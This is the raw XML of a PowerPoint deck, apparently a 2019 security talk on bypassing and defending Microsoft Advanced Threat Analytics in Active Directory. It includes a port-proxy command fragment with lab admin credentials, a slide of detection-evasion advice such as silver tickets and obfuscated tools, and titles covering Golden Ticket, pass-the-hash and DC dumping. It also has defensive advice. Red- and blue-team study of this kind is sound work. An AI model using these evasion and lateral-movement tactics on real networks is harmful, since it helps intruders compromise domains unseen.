              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=2135 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>connectaddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=127.0.0.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>connectport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=135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} -Credential WINLAB\admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux: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apt-get install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> python-dev libkrb5-dev python3-winrm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https://github.com/diyan/pywinrm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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Total Bypass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use DC events – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do not interact DC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>slvr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> ticket)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uses attacks signatures  – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>obfuscate your tools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watch for anomaly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– use standard protocols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Do it only if you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>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</a:rPr>
              <a:t>Test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> your attacks in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lab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</a:rPr>
              <a:t>Be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>careful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>when use Golden Ticket or lateral movement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</a:rPr>
              <a:t>Avoid technique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> if you don’t know it in depth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Update  your skills on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DC7831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Total Defense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3"/>
            <a:ext cx="11004468" cy="5066948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is anomaly based – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use it as part of defense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ATA uses signatures of attack – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>update signatures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User other defense tools (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SIEM, IPS, AV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="40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</a:rPr>
              <a:t>Test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> your ATA with Pentest/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RedTeams</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty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Create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BlueTeam</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D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Send ATA incidents to IT email (DB tampering….)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</a:rPr>
              <a:t>Update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>  your skills on DC7831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860C70-18E8-4FFF-909B-938E41829E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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="664818" y="442656"/>
            <a:ext cx="8636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uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Ubuntu"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Ubuntu"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
            <a:lvl6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6pPr>
            <a:lvl7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7pPr>
            <a:lvl8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8pPr>
            <a:lvl9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D9EBFF"/>
                </a:solidFill>
                <a:uFillTx/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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA5512"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thank You !</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0">
              <a:solidFill>
                <a:srgbClr val="BA5512"/>
              </a:solidFill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186A358-490C-4B12-9DAF-CEBAB32BF0E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918950" y="1628343"/>
            <a:ext cx="9145191" cy="206412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1pPr>
            <a:lvl2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2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
            <a:lvl6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6pPr>
            <a:lvl7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7pPr>
            <a:lvl8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8pPr>
            <a:lvl9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cap="none" spc="0" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="BAC8D9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/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dirty="0"/>
              <a:t>email: mis@m13.su</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Telegram channel: @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mis_team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mis-team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7FA608-3AD7-4814-BAFD-10494B6B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83" y="4693157"/>
            <a:ext cx="2715274" cy="15966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?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203222"/>
            <a:ext cx="11004468" cy="5056901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dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/advanced-threat-analytics/what-is-ata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="44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parse network traffic of multiple protocols (such as Kerberos, DNS, RPC, NTLM, and others)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SIEM, WEF (win Event Forwarding) integration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detects multiple suspicious activities, focusing on several phases of the cyber-attack kill chain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915191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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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 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844" y="1946031"/>
            <a:ext cx="11004468" cy="4314092"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="2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Pass-the-Ticket (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>PtT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Pass-the-Hash (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>PtH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/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Overpass-the-Hash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Forged PAC (MS14-068)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Golden Ticket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Malicious replications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Reconnaissance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Brute Force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Remote execution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840" y="1033154"/>
            <a:ext cx="11099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https://docs.microsoft.com/en-us/advanced-threat-analytics/what-is-ata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>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41" y="148588"/>
            <a:ext cx="10742297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Advanced Threat Analysis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3" y="1033154"/>
            <a:ext cx="5715000" cy="571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81" y="1376758"/>
            <a:ext cx="6985077" cy="52388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148" y="-5824"/>
            <a:ext cx="11000205" cy="88456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ATA – Advanced Threat Analysis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878742"/>
            <a:ext cx="11402986" cy="59792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3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1715</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Широкоэкранный</PresentationFormat>
  <Paragraphs>403</Paragraphs>
  <Slides>59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Ubuntu</vt:lpstr>
      <vt:lpstr>Тема Office</vt:lpstr>
      <vt:lpstr>Microsoft Advanced Threat Analytics</vt:lpstr>
      <vt:lpstr>微軟 高級威脅分析</vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>A long time ago in a galaxy far, far away… </vt:lpstr>
      <vt:lpstr>The price of mistake – MS ATA – WTF ??</vt:lpstr>
      <vt:lpstr>MS ATA - WTF ? </vt:lpstr>
      <vt:lpstr>MS ATA – WTF ?</vt:lpstr>
      <vt:lpstr>MS ATA – Advanced Threat Analysis </vt:lpstr>
      <vt:lpstr>MS ATA – Advanced Threat Analysis</vt:lpstr>
      <vt:lpstr>MS ATA – Create LAB</vt:lpstr>
      <vt:lpstr>MS ATA – Advanced Threat Analysis</vt:lpstr>
      <vt:lpstr>MS ATA - Analysis – MS KillChain</vt:lpstr>
      <vt:lpstr>MS ATA - Itself </vt:lpstr>
      <vt:lpstr>MS ATA - Itself</vt:lpstr>
      <vt:lpstr>MS ATA – How to Detect</vt:lpstr>
      <vt:lpstr>MS ATA – How to Detect</vt:lpstr>
      <vt:lpstr>MS ATA – How to Detect</vt:lpstr>
      <vt:lpstr>MS ATA</vt:lpstr>
      <vt:lpstr>MS ATA</vt:lpstr>
      <vt:lpstr>MS ATA</vt:lpstr>
      <vt:lpstr>MS ATA Center Itself </vt:lpstr>
      <vt:lpstr>MS ATA Center Itself </vt:lpstr>
      <vt:lpstr>MS ATA Center Itself - Tampering</vt:lpstr>
      <vt:lpstr>MS ATA – MS KILL CHAIN </vt:lpstr>
      <vt:lpstr>MS ATA </vt:lpstr>
      <vt:lpstr>MS ATA – Our own KillChain </vt:lpstr>
      <vt:lpstr>Our own KillChain</vt:lpstr>
      <vt:lpstr>Microsoft  ATA vs #КРЫМНАШ</vt:lpstr>
      <vt:lpstr>Recon, Enum </vt:lpstr>
      <vt:lpstr>MS ATA vs Recon, Enum</vt:lpstr>
      <vt:lpstr>Getting creds </vt:lpstr>
      <vt:lpstr>MS ATA vs Getting creds</vt:lpstr>
      <vt:lpstr>MS ATA vs Getting creds</vt:lpstr>
      <vt:lpstr>Recon with creds </vt:lpstr>
      <vt:lpstr>MS ATA vs Recon with creds </vt:lpstr>
      <vt:lpstr>MS ATA vs Recon with creds</vt:lpstr>
      <vt:lpstr>Assets Access, Code Execution </vt:lpstr>
      <vt:lpstr>MS ATA vs Assets Access</vt:lpstr>
      <vt:lpstr>MS ATA – bruiting, pass-the-hash </vt:lpstr>
      <vt:lpstr>MS ATA vs Assets Access bypass  </vt:lpstr>
      <vt:lpstr>MS ATA vs Assets Access bypass</vt:lpstr>
      <vt:lpstr>MS ATA – vs Pass-the-Ticket </vt:lpstr>
      <vt:lpstr>MS ATA – vs Pass-the-Ticket </vt:lpstr>
      <vt:lpstr>MS ATA </vt:lpstr>
      <vt:lpstr>MS ATA vs Kerberoasting</vt:lpstr>
      <vt:lpstr>MS ATA vs Code Execution</vt:lpstr>
      <vt:lpstr>MS ATA vs RCE </vt:lpstr>
      <vt:lpstr>MS ATA vs RCE </vt:lpstr>
      <vt:lpstr>MS ATA vs Remote Exec and Later Movement </vt:lpstr>
      <vt:lpstr>MS ATA vs Persistence </vt:lpstr>
      <vt:lpstr>MS ATA vs Golden Ticket </vt:lpstr>
      <vt:lpstr>MS ATA vs Golden Ticket </vt:lpstr>
      <vt:lpstr>MS ATA vs DC dumping </vt:lpstr>
      <vt:lpstr>MS ATA vs DC dumping </vt:lpstr>
      <vt:lpstr>MS ATA vs DC dumping – DC as proxy </vt:lpstr>
      <vt:lpstr>MS ATA vs DC dumping – RCE on DC</vt:lpstr>
      <vt:lpstr>MS ATA – Total Bypass </vt:lpstr>
      <vt:lpstr>MS ATA – Total Defense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Advanced Threat Analytics (и не только )</dc:title>
  <dc:creator>IEUser</dc:creator>
  <cp:lastModifiedBy>Jonathan</cp:lastModifiedBy>
  <cp:revision>56</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-02-12T09:33:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-02-21T04:40:38Z</dcterms:modified>
</cp:coreProperties>
</file>